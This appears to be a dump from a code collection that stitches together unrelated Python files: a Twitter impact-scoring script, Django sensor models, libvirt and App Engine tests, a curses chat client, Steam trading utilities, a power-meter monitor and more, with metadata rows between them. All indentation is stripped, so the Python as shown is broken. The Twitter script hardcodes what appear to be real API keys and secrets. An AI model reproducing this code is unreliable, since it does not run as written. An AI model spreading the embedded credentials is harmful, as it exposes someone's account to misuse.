# insert new data at the correct point in the file
entrylength=metadata['datalength'] + len(metadata['separator'])
with open(datapath, mode) as fp:
startIndex=(data[0][0]-metadata['starttime'])/60*entrylength
fp.seek(0, os.SEEK_END)
filesize = fp.tell()
#if the file has been untouched for too long: append dummy data
if filesize < startIndex:
fp.write(("???".zfill(metadata['datalength']) + metadata['separator'])*((startIndex - filesize)/entrylength))
fp.seek(startIndex,0)
for row in data:
fp.write(str(row[1]).zfill(metadata['datalength'])+ metadata['separator'])
# save (updated) meta data file
with open(metapath, 'wb') as fp:
json.dump(metadata, fp)
| gpl-2.0 | 5,187,222,242,806,256,000 | 42.027778 | 375 | 0.659671 | false | 4.277624 | false | false | false |
AndyKrivovjas/notes | setup.py | 2 | 1714 | #!/usr/bin/env python
from setuptools import setup, find_packages
# Shamelessly stolen (then modified) from https://github.com/cburgmer/pdfserver/blob/master/setup.py
def parse_requirements(file_name):
import re
requirements = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'(\s*#)|(\s*$)', line):
continue
# if re.match(r'\s*-e\s+', line):
m = re.search(r"(git(?:\+\w{3})?|https?|svn)://.+#egg=(.*)$", line)
if m:
# FIXME: Can't install packages from source repos right now
if 'http' in m.group(1):
# Distutils can install Http served packages right now
# FIXME: Skip this now
# requirements.append(m.group(2))
pass
pass
elif re.match(r'\s*-f\s+', line):
pass
elif re.match(r'\s*-i\s+', line):
pass
else:
requirements.append(line)
return requirements
def parse_dependency_links(file_name):
import re
dependency_links = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'\s*-[ef]\s+', line):
dependency_links.append(re.sub(r'\s*-[ef]\s+', '', line))
continue
m = re.search(r"((?:git(?:\+ssh)|http|svn)://.+#egg=.*)$", line)
if m:
dependency_links.append(m.group(1))
return dependency_links
params = dict(
name='API Example',
packages=find_packages(),
install_requires=parse_requirements('requirements.txt'),
dependency_links=parse_dependency_links('requirements.txt'),
entry_points={
'console_scripts': [
]
},
)
setup(**params)
| mit | -7,590,833,484,005,609,000 | 29.070175 | 100 | 0.547841 | false | 3.631356 | false | false | false |
akhan3674/twitterMapper | project/project/impact.py | 2 | 2804 | #code to save tweets in json
import sys
import tweepy
import json
import csv
from textblob import TextBlob
import os
import time
from datetime import datetime
from threading import Timer
access_key = "2864513512-1JkMkwIRHMjSBLdNgh1zIGiSX2ZJMnhoZZ3b8uR"
access_secret = "vpBlz4E2eSZnw7TVlUAGcmwI4AZ6Hf2Z9CBhin3S7HZSl"
consumer_key = "50n8PRe0MTuC6NyYEqUqnwJsf"
consumer_secret = "ZCFFAbNZfJqwsM1QuPPPBC5ahSX3F8Xsm3PVY4p0PKexO89ygt"
def impactScore(follows, retwt_count, fav_count):
#Users with many followers will report an impact score close to the # of retweets
#Users with very few followers, have their impact score re-scaled to reflect the minimal penetration of their retweeting
impact = 0.0
try:
impact = (retwt_count * follows) / (follows + retwt_count + fav_count)
except ZeroDivisionError:
impact = 0.0
else:
impact = (retwt_count * follows) / (follows + retwt_count + fav_count)
return impact
def analysis(js):
twt=json.loads(js)
if(twt['lang']=='en'):
txt=twt['text']
#check if this is a retweet
try:
retwt_count=twt['retweeted_status']['retweet_count']
#if it is, return its retweet count
except KeyError:
retwt_count=twt['retweet_count']
#otherwise return the original tweet's retweet count
else:
retwt_count=twt['retweeted_status']['retweet_count']
#do the same for favorites
try:
fav_count=twt['retweeted_status']['favorite_count']
except KeyError:
fav_count=twt['favorite_count']
else:
fav_count=twt['retweeted_status']['favorite_count']
follows=twt['user']['followers_count']
username=twt['user']['screen_name']
blob=TextBlob(txt)
pol=blob.sentiment.polarity
print "Posted by ",username
print "Seen by ",follows," users"
print "Favorited by ",fav_count," users"
print "Retweeted by ",retwt_count, " users"
print "Polarity : ",blob.sentiment.polarity
score = impactScore(follows, retwt_count, fav_count)
print "Impact Score is ",score
#print "Average Polarity: ",avgpol
#print "Magnification : ",retwt_count + fav_count
raw_input("Continue.")
#time.delay(1)
class CustomStreamListener(tweepy.StreamListener):
def on_status(self, status):
print status.text
def on_data(self, data):
analysis(data)
def on_error(self, status_code):
print >> sys.stderr, 'Encountered error with status code:', status_code
return True # Don't kill the stream
def on_timeout(self):
print >> sys.stderr, 'Timeout...'
return True #Don't kill the stream
keyword=raw_input("Please Enter a Keyword: ")
auth=tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_key, access_secret)
api=tweepy.API(auth)
while True:
engine=tweepy.streaming.Stream(auth, CustomStreamListener())
engine.filter(track=list([keyword]))
#engine.filter(track=['Nike'])
| mit | 2,873,744,741,846,187,000 | 28.208333 | 121 | 0.729315 | false | 2.838057 | false | false | false |
ResEnv/chain-api | chain/core/models.py | 1 | 7564 | from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
class GeoLocation(models.Model):
latitude = models.FloatField()
longitude = models.FloatField()
elevation = models.FloatField(null=True, blank=True)
class Metadata(models.Model):
'''Metadata assoicated with a site, a device, or a sensor'''
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
key = models.CharField(max_length=255)
value = models.TextField(blank=True)
timestamp = models.DateTimeField(default=timezone.now, blank=True)
class Site(models.Model):
'''An installation of Chain API, usually on the scale of several or many
buildings. Sites might be hosted on a remote server, in which case the URL
field will point to that resource on that server. If the site is hosted
locally the URL can be blank'''
name = models.CharField(max_length=255)
url = models.CharField(max_length=255, default='', blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
raw_zmq_stream = models.CharField(max_length=255, default='', blank=True)
def __repr__(self):
return 'Site(name=%r)' % (self.name)
def __str__(self):
return self.name
class Device(models.Model):
'''A set of co-located sensors, often sharing a PCB'''
name = models.CharField(max_length=255)
site = models.ForeignKey(Site, related_name='devices')
description = models.TextField(blank=True)
building = models.CharField(max_length=255, blank=True)
floor = models.CharField(max_length=10, blank=True)
room = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
active = models.BooleanField(default=True)
class Meta:
unique_together = ['site', 'name', 'building', 'floor', 'room']
ordering = ["name"]
def __repr__(self):
return ('Device(site=%r, name=%r, description=%r, building=%r, ' +
'floor=%r, room=%r)') % (
self.site, self.name, self.description, self.building,
self.floor, self.room)
def __str__(self):
return self.name
class Unit(models.Model):
'''A unit used on a data point, such as "m", or "kWh"'''
name = models.CharField(max_length=30, unique=True)
def __repr__(self):
return 'Unit(name=%r)' % self.name
def __str__(self):
return self.name
class Metric(models.Model):
'''A metric that might be measured, such as "temperature" or "humidity".
This is used to tie together a set of ScalarData points that are all
measuring the same thing.'''
name = models.CharField(max_length=255, unique=True)
def __repr__(self):
return 'Metric(name=%r)' % self.name
def __str__(self):
return self.name
class ScalarSensor(models.Model):
'''An individual sensor. There may be multiple sensors on a single device.
The metadata field is used to store information that might be necessary to
tie the Sensor data to the physical Sensor in the real world, such as a MAC
address, serial number, etc.'''
device = models.ForeignKey(Device, related_name='sensors')
metric = models.ForeignKey(Metric, related_name='sensors')
unit = models.ForeignKey(Unit, related_name='sensors')
metadata = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
active = models.BooleanField(default=True)
class Meta:
unique_together = ['device', 'metric']
def __repr__(self):
return 'Sensor(device=%r, metric=%r, unit=%r)' % (
self.device, self.metric, self.unit)
def __str__(self):
return self.metric.name
class Person(models.Model):
'''A Person involved with the site. Some sensors might detect presence of a
person, so they can reference this model with person-specific
information'''
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
picture_url = models.CharField(max_length=255, blank=True)
twitter_handle = models.CharField(max_length=255, blank=True)
rfid = models.CharField(max_length=255, blank=True)
site = models.ForeignKey(Site, related_name='people')
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
class Meta:
verbose_name_plural = "people"
def __repr__(self):
return ('Person(first_name=%s, last_name=%s, picture_url=%s, ' +
'twitter_handle=%s, rfid=%s)') % (
self.first_name, self.last_name, self.picture_url,
self.twitter_handle, self.rfid)
def __str__(self):
return " ".join([self.first_name, self.last_name])
class PresenceSensor(models.Model):
'''An individual sensor. There may be multiple sensors on a single device.
The metadata field is used to store information that might be necessary to
tie the Sensor data to the physical Sensor in the real world, such as a MAC
address, serial number, etc.'''
device = models.ForeignKey(Device, related_name='presence_sensors')
metric = models.ForeignKey(Metric, related_name='presence_sensors')
# unit = models.ForeignKey(Unit, related_name='sensors')
metadata = models.CharField(max_length=255, blank=True)
geo_location = models.OneToOneField(GeoLocation, null=True, blank=True)
class Meta:
unique_together = ['device', 'metric']
def __repr__(self):
return 'PresenceSensor(device=%r, id=%r)' % (
self.device, self.id)
def __str__(self):
return str(self.metric)
# self.metric.name
class PresenceData(models.Model):
'''Sensor data indicating that a given Person was detected by the sensor at
the given time, for instance using RFID or face recognition. Note that this
is also used to indicate that a person was NOT seen by a given sensor by
setting present=False. Typically a Presence sensor should indicate once
when a person is first detected, then again when they are first absent.'''
sensor = models.ForeignKey(PresenceSensor, related_name='presence_data')
timestamp = models.DateTimeField(default=timezone.now, blank=True)
person = models.ForeignKey(Person, related_name='presense_data')
present = models.BooleanField(default=None)
class Meta:
verbose_name_plural = "presence data"
def __repr__(self):
return ('PresenceData(timestamp=%r, sensor=%r, ' +
'person=%r, present=%r)') % (
self.timestamp, self.sensor, self.person, self.present)
def __str__(self):
return '%s %spresent' % (self.person,
'not ' if not self.present else '')
class StatusUpdate(models.Model):
'''Status updates for people, such as tweets, facebook status updates, etc.
This is probably outside of the scope of a general system for tracking
sensor data, but is included here for simplicity with the actual
deployments of DoppelLab. If we deploy this as a generic tool we may want
to strip this out.'''
timestamp = models.DateTimeField(default=timezone.now, blank=True)
person = models.ForeignKey(Person, related_name='status_updates')
status = models.TextField()
| mit | -1,856,304,268,129,593,900 | 38.395833 | 79 | 0.671867 | false | 3.966439 | false | false | false |
billy1380/appengine-pipelines | python/test/util_test.py | 2 | 1433 | #!/usr/bin/env python
"""Tests for util.py."""
import datetime
import logging
import os
import sys
import unittest
# Fix up paths for running tests.
sys.path.insert(0, "../src/")
from pipeline import util
from google.appengine.api import taskqueue
class JsonSerializationTest(unittest.TestCase):
"""Test custom json encoder and decoder."""
def testE2e(self):
now = datetime.datetime.now()
obj = {"a": 1, "b": [{"c": "d"}], "e": now}
new_obj = util.json.loads(util.json.dumps(
obj, cls=util.JsonEncoder), cls=util.JsonDecoder)
self.assertEquals(obj, new_obj)
class GetTaskTargetTest(unittest.TestCase):
def setUp(self):
super(GetTaskTargetTest, self).setUp()
os.environ["CURRENT_VERSION_ID"] = "v7.1"
os.environ["CURRENT_MODULE_ID"] = "foo-module"
def testGetTaskTarget(self):
self.assertEqual("v7.foo-module", util._get_task_target())
task = taskqueue.Task(url="/relative_url",
target=util._get_task_target())
self.assertEqual("v7.foo-module", task.target)
def testGetTaskTargetDefaultModule(self):
os.environ["CURRENT_MODULE_ID"] = "default"
self.assertEqual("v7", util._get_task_target())
task = taskqueue.Task(url="/relative_url",
target=util._get_task_target())
self.assertEqual("v7", task.target)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| apache-2.0 | -4,971,806,801,304,813,000 | 26.557692 | 62 | 0.659456 | false | 3.444712 | true | false | false |
ryanmiao/libvirt-test-API | repos/domain/blkstats.py | 1 | 1762 | #!/usr/bin/evn python
# To test domain block device statistics
import os
import sys
import time
import libxml2
import libvirt
from libvirt import libvirtError
from src import sharedmod
required_params = ('guestname',)
optional_params = {}
def check_guest_status(domobj):
"""Check guest current status"""
state = domobj.info()[0]
if state == libvirt.VIR_DOMAIN_SHUTOFF or state == libvirt.VIR_DOMAIN_SHUTDOWN:
# add check function
return False
else:
return True
def check_blkstats():
"""Check block device statistic result"""
pass
def blkstats(params):
"""Domain block device statistic"""
logger = params['logger']
guestname = params['guestname']
conn = sharedmod.libvirtobj['conn']
domobj = conn.lookupByName(guestname)
# Check domain block status
if check_guest_status(domobj):
pass
else:
domobj.create()
time.sleep(90)
try:
xml = domobj.XMLDesc(0)
doc = libxml2.parseDoc(xml)
cont = doc.xpathNewContext()
devs = cont.xpathEval("/domain/devices/disk/target/@dev")
path = devs[0].content
blkstats = domobj.blockStats(path)
except libvirtError, e:
logger.error("API error message: %s, error code is %s" \
% (e.message, e.get_error_code()))
return 1
if blkstats:
# check_blkstats()
logger.debug(blkstats)
logger.info("%s rd_req %s" %(path, blkstats[0]))
logger.info("%s rd_bytes %s" %(path, blkstats[1]))
logger.info("%s wr_req %s" %(path, blkstats[2]))
logger.info("%s wr_bytes %s" %(path, blkstats[3]))
else:
logger.error("fail to get domain block statistics\n")
return 1
return 0
| gpl-2.0 | 4,589,441,104,892,047,000 | 24.911765 | 83 | 0.61748 | false | 3.603272 | false | false | false |
keiichishima/FX5204PS | contrib/monitor/monitor.py | 1 | 4417 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import pygame
from fx5204ps import FX5204PS
GRAPH_WIDTH = 600
GRAPH_HEIGHT = 100
SCREEN_SIZE = (GRAPH_WIDTH + 200, (GRAPH_HEIGHT + 50) * 4 + 50)
BLACK = (0,0,0)
WHITE = (255,255,255)
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
class Graph(object):
def __init__(self, screen, pos, index):
self._screen = screen
self._x = pos[0]
self._y = pos[1]
self._index = index
self._watt_history = [0] * GRAPH_WIDTH
self._avg_history = [0] * GRAPH_WIDTH
self._max_history = [0] * GRAPH_WIDTH
self._scale = 1.0
self._font = pygame.font.SysFont(None, 24)
def _draw_line(self, history, color):
for t in range(1, GRAPH_WIDTH - 1):
x0 = t - 1 + self._x
y0 = (GRAPH_HEIGHT - history[t - 1] * self._scale + self._y)
x1 = t + self._x
y1 = (GRAPH_HEIGHT - history[t] * self._scale + self._y)
pygame.draw.line(self._screen, color, (x0, y0), (x1, y1))
def draw(self):
self._draw_line(self._max_history, RED)
self._draw_line(self._watt_history, BLUE)
self._draw_line(self._avg_history, GREEN)
pygame.draw.line(self._screen, WHITE,
(self._x, self._y),
(self._x, self._y + GRAPH_HEIGHT))
pygame.draw.line(self._screen, WHITE,
(self._x, self._y + GRAPH_HEIGHT),
(self._x + GRAPH_WIDTH, self._y + GRAPH_HEIGHT))
max_text = self._font.render(
'Max: {0} W'.format(self._max_history[-1]),
True, RED)
self._screen.blit(max_text, (self._x + GRAPH_WIDTH, self._y))
avg_text = self._font.render(
'Avg: {0} W'.format(self._avg_history[-1]),
True, GREEN)
self._screen.blit(avg_text, (self._x + GRAPH_WIDTH, self._y + 30))
watt_text = self._font.render(
'Watt: {0} W'.format(self._watt_history[-1]),
True, BLUE)
self._screen.blit(watt_text, (self._x + GRAPH_WIDTH, self._y + 60))
y_zero_text = self._font.render('0', True, WHITE)
w = y_zero_text.get_rect().width
self._screen.blit(y_zero_text,
(self._x - w, self._y + GRAPH_HEIGHT))
y_max_text = self._font.render(
'{0} W'.format(int(GRAPH_HEIGHT / self._scale)),
True, WHITE)
w = y_max_text.get_rect().width
self._screen.blit(y_max_text, (self._x - w, self._y))
title_text = self._font.render('Port {0}'.format(self._index),
True, WHITE)
self._screen.blit(title_text, (self._x + 20, self._y - 20))
def update(self, watt, watt_avg, watt_max):
self._max_history.pop(0)
self._max_history.append(watt_max)
self._watt_history.pop(0)
self._watt_history.append(watt)
self._avg_history.pop(0)
self._avg_history.append(watt_avg)
max_in_history = max(self._max_history)
if max_in_history > GRAPH_HEIGHT:
self._scale = GRAPH_HEIGHT / max_in_history
else:
self._scale = 1.0
def draw_graph(fx):
pygame.init()
pygame.display.set_caption('FX5204PS Status')
clock = pygame.time.Clock()
screen = pygame.display.set_mode(SCREEN_SIZE)
font = pygame.font.SysFont(None, 24)
graphs = []
for i in range(4):
graphs.append(Graph(screen,
(60, (GRAPH_HEIGHT + 50) * i + 50),
i))
while True:
clock.tick(10)
screen.fill(BLACK)
watt = fx.wattage
watt_avg = fx.wattage_avg
watt_max = fx.wattage_max
for i in range(4):
graphs[i].update(watt[i], watt_avg[i], watt_max[i])
graphs[i].draw()
freq = fx.frequency
volt = fx.voltage
temp = fx.temperature
status_text = font.render(
'Volt:{0} V, Freq: {1} Hz, Temp: {2} C'.format(
volt, freq, temp),
True, WHITE)
screen.blit(status_text, (0, 0))
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if __name__ == '__main__':
fx = FX5204PS(sumup_interval=10)
fx.start()
draw_graph(fx)
fx.stop()
| bsd-2-clause | 4,841,013,284,531,553,000 | 31.962687 | 75 | 0.518225 | false | 3.186869 | false | false | false |
bukson/steampy | steampy/utils.py | 1 | 7402 | import decimal
import os
import copy
import struct
import urllib.parse as urlparse
import re
from requests.structures import CaseInsensitiveDict
from typing import List
from bs4 import BeautifulSoup, Tag
from steampy.models import GameOptions
def text_between(text: str, begin: str, end: str) -> str:
start = text.index(begin) + len(begin)
end = text.index(end, start)
return text[start:end]
def texts_between(text: str, begin: str, end: str):
stop = 0
while True:
try:
start = text.index(begin, stop) + len(begin)
stop = text.index(end, start)
yield text[start:stop]
except ValueError:
return
def account_id_to_steam_id(account_id: str) -> str:
first_bytes = int(account_id).to_bytes(4, byteorder='big')
last_bytes = 0x1100001.to_bytes(4, byteorder='big')
return str(struct.unpack('>Q', last_bytes + first_bytes)[0])
def steam_id_to_account_id(steam_id: str) -> str:
return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
def parse_price(price: str) -> decimal.Decimal:
pattern = '\D?(\\d*)(\\.|,)?(\\d*)'
tokens = re.search(pattern, price, re.UNICODE)
decimal_str = tokens.group(1) + '.' + tokens.group(3)
return decimal.Decimal(decimal_str)
def merge_items_with_descriptions_from_inventory(inventory_response: dict, game: GameOptions) -> dict:
inventory = inventory_response.get('assets', [])
if not inventory:
return {}
descriptions = {get_description_key(description): description for description in inventory_response['descriptions']}
return merge_items(inventory, descriptions, context_id=game.context_id)
def merge_items_with_descriptions_from_offers(offers_response: dict) -> dict:
descriptions = {get_description_key(offer): offer for offer in offers_response['response'].get('descriptions', [])}
received_offers = offers_response['response'].get('trade_offers_received', [])
sent_offers = offers_response['response'].get('trade_offers_sent', [])
offers_response['response']['trade_offers_received'] = list(
map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), received_offers))
offers_response['response']['trade_offers_sent'] = list(
map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), sent_offers))
return offers_response
def merge_items_with_descriptions_from_offer(offer: dict, descriptions: dict) -> dict:
merged_items_to_give = merge_items(offer.get('items_to_give', []), descriptions)
merged_items_to_receive = merge_items(offer.get('items_to_receive', []), descriptions)
offer['items_to_give'] = merged_items_to_give
offer['items_to_receive'] = merged_items_to_receive
return offer
def merge_items_with_descriptions_from_listing(listings: dict, ids_to_assets_address: dict,
descriptions: dict) -> dict:
for listing_id, listing in listings.get("sell_listings").items():
asset_address = ids_to_assets_address[listing_id]
description = descriptions[asset_address[0]][asset_address[1]][asset_address[2]]
listing["description"] = description
return listings
def merge_items(items: List[dict], descriptions: dict, **kwargs) -> dict:
merged_items = {}
for item in items:
description_key = get_description_key(item)
description = copy.copy(descriptions[description_key])
item_id = item.get('id') or item['assetid']
description['contextid'] = item.get('contextid') or kwargs['context_id']
description['id'] = item_id
description['amount'] = item['amount']
merged_items[item_id] = description
return merged_items
def get_market_listings_from_html(html: str) -> dict:
document = BeautifulSoup(html, "html.parser")
nodes = document.select("div[id=myListings]")[0].findAll("div", {"class": "market_home_listing_table"})
sell_listings_dict = {}
buy_orders_dict = {}
for node in nodes:
if "My sell listings" in node.text:
sell_listings_dict = get_sell_listings_from_node(node)
elif "My listings awaiting confirmation" in node.text:
sell_listings_awaiting_conf = get_sell_listings_from_node(node)
for listing in sell_listings_awaiting_conf.values():
listing["need_confirmation"] = True
sell_listings_dict.update(sell_listings_awaiting_conf)
elif "My buy orders" in node.text:
buy_orders_dict = get_buy_orders_from_node(node)
return {"buy_orders": buy_orders_dict, "sell_listings": sell_listings_dict}
def get_sell_listings_from_node(node: Tag) -> dict:
sell_listings_raw = node.findAll("div", {"id": re.compile('mylisting_\d+')})
sell_listings_dict = {}
for listing_raw in sell_listings_raw:
spans = listing_raw.select("span[title]")
listing = {
"listing_id": listing_raw.attrs["id"].replace("mylisting_", ""),
"buyer_pay": spans[0].text.strip(),
"you_receive": spans[1].text.strip()[1:-1],
"created_on": listing_raw.findAll("div", {"class": "market_listing_listed_date"})[0].text.strip(),
"need_confirmation": False
}
sell_listings_dict[listing["listing_id"]] = listing
return sell_listings_dict
def get_market_sell_listings_from_api(html: str) -> dict:
document = BeautifulSoup(html, "html.parser")
sell_listings_dict = get_sell_listings_from_node(document)
return {"sell_listings": sell_listings_dict}
def get_buy_orders_from_node(node: Tag) -> dict:
buy_orders_raw = node.findAll("div", {"id": re.compile('mybuyorder_\\d+')})
buy_orders_dict = {}
for order in buy_orders_raw:
qnt_price_raw = order.select("span[class=market_listing_price]")[0].text.split("@")
order = {
"order_id": order.attrs["id"].replace("mybuyorder_", ""),
"quantity": int(qnt_price_raw[0].strip()),
"price": qnt_price_raw[1].strip(),
"item_name": order.a.text
}
buy_orders_dict[order["order_id"]] = order
return buy_orders_dict
def get_listing_id_to_assets_address_from_html(html: str) -> dict:
listing_id_to_assets_address = {}
regex = "CreateItemHoverFromContainer\( [\w]+, 'mylisting_([\d]+)_[\w]+', ([\d]+), '([\d]+)', '([\d]+)', [\d]+ \);"
for match in re.findall(regex, html):
listing_id_to_assets_address[match[0]] = [str(match[1]), match[2], match[3]]
return listing_id_to_assets_address
def get_description_key(item: dict) -> str:
return item['classid'] + '_' + item['instanceid']
def get_key_value_from_url(url: str, key: str, case_sensitive: bool=True) -> str:
params = urlparse.urlparse(url).query
if case_sensitive:
return urlparse.parse_qs(params)[key][0]
else:
return CaseInsensitiveDict(urlparse.parse_qs(params))[key][0]
def load_credentials():
dirname = os.path.dirname(os.path.abspath(__file__))
with open(dirname + '/../secrets/credentials.pwd', 'r') as f:
return [Credentials(line.split()[0], line.split()[1], line.split()[2]) for line in f]
class Credentials:
def __init__(self, login: str, password: str, api_key: str):
self.login = login
self.password = password
self.api_key = api_key
| mit | 232,540,412,038,118,100 | 39.228261 | 120 | 0.644285 | false | 3.436397 | false | false | false |
gu471/winChat_Server | test.py | 1 | 5113 | import socket
import sys
from thread import start_new_thread
from chatClasses import tcpHandler
import time
import curses
screen = curses.initscr()
screen.immedok(True)
curses.noecho()
curses.curs_set(0)
curses.cbreak()
screen.keypad(1)
listenerPort = 5006
promoterPort = 5005
server_address = "127.0.0.1"
chat2Write = []
log2Write = []
Xmessages = []
debug = 80
tosend = ""
closing = False
sending = False
disconnecting = False
listenerConnection = None
promoterConnection = None
uuid = ""
def handleData(data):
log(data, 0)
return
def log(logMsg, verbosity = 0):
global log2Write
if (verbosity < debug):
log2Write.append("[" + str(verbosity) + "]: " + logMsg)
if (verbosity <= 5):
chat2Write.append(logMsg)
def connectSocket(_type, server_address, port):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to server
try:
sock.connect((server_address, port))
log("starting up on %s port %s _ " % sock.getsockname() + _type, 2)
except socket.error, msg:
log(_type + " : Connect Failed. Error Code: {} Error: {}".format(str(msg[0]), msg[1]), 2)
sys.exit()
return sock
def startListener(address, port):
global disconnecting
log("startung listener", 120)
connection = connectSocket("listener", address, port)
tcp = tcpHandler(connection)
global listenerConnection
global uuid
listenerConnection = connection
data = str(uuid)
tcp.write(data)
while True:
try:
data, length = tcp.listen()
log(address + ": '%s'" % data, 20)
if data:
handleData(data)
else:
log(address + ": connection closed _ listener", 2)
break
except socket.error, msg:
if '[Errno 32] Broken pipe' in str(msg):
log(address + ": connection closed _ listener", 2)
else:
log(address + ": '%s'" % msg + " _ listener", 2)
break
uuid = ""
disconnecting = True
def startPromoter(address, port):
global disconnecting
global sending
global tosend
global uuid
connection = connectSocket("promoter", address, port)
tcp = tcpHandler(connection)
global promoterConnection
promoterConnection = connection
uuid, length = tcp.listen()
log(str(uuid) + " | " + str(length), 40)
while not disconnecting:
if sending:
if tosend != "":
log("want to send: " + tosend, 120)
log(tcp.write(tosend), 120)
tosend = ""
sending = False
uuid = ""
connection.close()
log(address + ": connection closed _ promoter", 2)
def write2Box(box, messageList, lastLength, maxLines):
empty = ""
for i in range(1,99):
empty += " "
logLength = len(messageList)
tempWrite = messageList
if logLength > lastLength:
if logLength < maxLines:
maxim = logLength
else:
maxim = maxLines
i = 0
while i < maxim:
box.addstr(i+1, 1, empty)
box.addstr(i+1, 1, tempWrite[logLength - i - 1])
i += 1
return logLength, box
box.refresh()
else:
return lastLength, box
def printScreen():
global tosend
global screen
global log2Write
empty = ""
for i in range(1,99):
empty += " "
logLength = 0
chatLength = 0
lastToSendLength = 0
screen.clear()
chatbox = curses.newwin(22, 120, 0, 0)
chatbox.box()
chatbox.refresh()
sendbox = curses.newwin(3, 120, 23, 0)
sendbox.box()
sendbox.refresh()
logbox = curses.newwin(35, 120, 27, 0)
logbox.box()
logbox.refresh()
screen.addstr(63, 1, "F5 - (re)connect")
screen.addstr(" | END - close")
screen.addstr(64, 1, "F6 - disconnect")
while True:
logLength, box = write2Box(logbox, log2Write, logLength, 35)
box.refresh()
chatLength, box = write2Box(chatbox, chat2Write, chatLength, 20)
box.refresh()
lengthToSend = len(tosend)
if lengthToSend <> lastToSendLength:
lastToSendLength = lengthToSend
sendbox.addstr(1, 1, empty)
sendbox.addstr(1, 1, tosend)
sendbox.refresh()
screen.refresh()
def checkKeyboard():
global tosend
global closing
global sending
global screen
global disconnecting
global listenerConnection
key = ''
while not closing:
key = screen.getch()
if key == curses.KEY_END:
closing = True
elif key == ord('\n'):
sending = True
elif key == curses.KEY_BACKSPACE:
tosend = tosend[:-1]
elif key == curses.KEY_F5:
connect()
elif key == curses.KEY_F6:
disconnecting = True
log("connection closed _ listener", 2)
elif key <= 256:
tosend += chr(key)
def connect():
global server_address
global promoterPort
global listenerPort
global uuid
global disconnecting
disconnecting = False
start_new_thread(startPromoter, (server_address, promoterPort,))
while uuid == "":
time.sleep(1)
log("connect with uuid: " + str(uuid), 20)
log("prepare listener start", 120)
start_new_thread(startListener, (server_address, listenerPort,))
def Main():
global closing
global tosend
global uuid
global listenerConnection
global promoterConnection
start_new_thread(printScreen, ())
start_new_thread(checkKeyboard, ())
connect()
while not closing:
pass
time.sleep(1)
listenerConnection.close()
promoterConnection.close()
curses.endwin()
Main()
| gpl-3.0 | -7,801,153,503,613,307,000 | 18.515267 | 91 | 0.672599 | false | 2.970947 | false | false | false |
OpenOil-UG/aleph | aleph/views/base_api.py | 1 | 3171 | import os
import logging
from time import time
from apikit import jsonify
from flask import render_template, current_app, Blueprint, request
from jsonschema import ValidationError
from elasticsearch import TransportError
from aleph.core import get_config
from aleph.model.constants import CORE_FACETS, SOURCE_CATEGORIES
from aleph.model.constants import COUNTRY_NAMES, LANGUAGE_NAMES
from aleph.model.validation import resolver
from aleph.views.cache import enable_cache
blueprint = Blueprint('base_api', __name__)
log = logging.getLogger(__name__)
def angular_templates():
templates = {}
template_dirs = [current_app.static_folder]
template_dirs.extend(get_config('CUSTOM_TEMPLATES_DIR'))
for template_dir in template_dirs:
for tmpl_set in ['templates', 'help']:
tmpl_dir = os.path.join(template_dir, tmpl_set)
for (root, dirs, files) in os.walk(tmpl_dir):
for file_name in files:
file_path = os.path.join(root, file_name)
with open(file_path, 'rb') as fh:
file_name = file_path[len(template_dir) + 1:]
templates[file_name] = fh.read().decode('utf-8')
return templates.items()
@blueprint.route('/search')
@blueprint.route('/help')
@blueprint.route('/help/<path:path>')
@blueprint.route('/entities')
@blueprint.route('/entities/<path:path>')
@blueprint.route('/crawlers')
@blueprint.route('/crawlers/logs')
@blueprint.route('/tabular/<path:path>')
@blueprint.route('/text/<path:path>')
@blueprint.route('/')
def ui(**kwargs):
enable_cache(server_side=True)
return render_template("layout.html", templates=angular_templates())
@blueprint.route('/api/1/metadata')
def metadata():
enable_cache(server_side=False)
schemata = {}
for schema_id, schema in resolver.store.items():
if not schema_id.endswith('#'):
schema_id = schema_id + '#'
schemata[schema_id] = {
'id': schema_id,
'title': schema.get('title'),
'faIcon': schema.get('faIcon'),
'plural': schema.get('plural', schema.get('title')),
'description': schema.get('description'),
'inline': schema.get('inline', False)
}
return jsonify({
'status': 'ok',
'fields': CORE_FACETS,
'source_categories': SOURCE_CATEGORIES,
'countries': COUNTRY_NAMES,
'languages': LANGUAGE_NAMES,
'schemata': schemata
})
@blueprint.app_errorhandler(403)
def handle_authz_error(err):
return jsonify({
'status': 'error',
'message': 'You are not authorized to do this.',
'roles': request.auth_roles,
'user': request.auth_role
}, status=403)
@blueprint.app_errorhandler(ValidationError)
def handle_validation_error(err):
return jsonify({
'status': 'error',
'message': err.message
}, status=400)
@blueprint.app_errorhandler(TransportError)
def handle_es_error(err):
return jsonify({
'status': 'error',
'message': err.error,
'info': err.info.get('error', {}).get('root_cause', [])[-1]
}, status=400)
| mit | -845,400,836,799,092,400 | 31.030303 | 72 | 0.629454 | false | 3.691502 | false | false | false |
PinguinoIDE/pinguino-bootloaders | p8/usb/v5.x/tools/uploader8.py | 2 | 32716 | #!/usr/bin/env python
#-*- coding: iso-8859-15 -*-
"""---------------------------------------------------------------------
_____ _____ _ _ _____ _ _ _____ _ _ ____
| __ \_ _| \ | |/ ____| | | |_ _| \ | |/ __ \
| |__) || | | \| | | __| | | | | | | \| | | | |
| ___/ | | | . ` | | |_ | | | | | | | . ` | | | |
| | _| |_| |\ | |__| | |__| |_| |_| |\ | |__| |
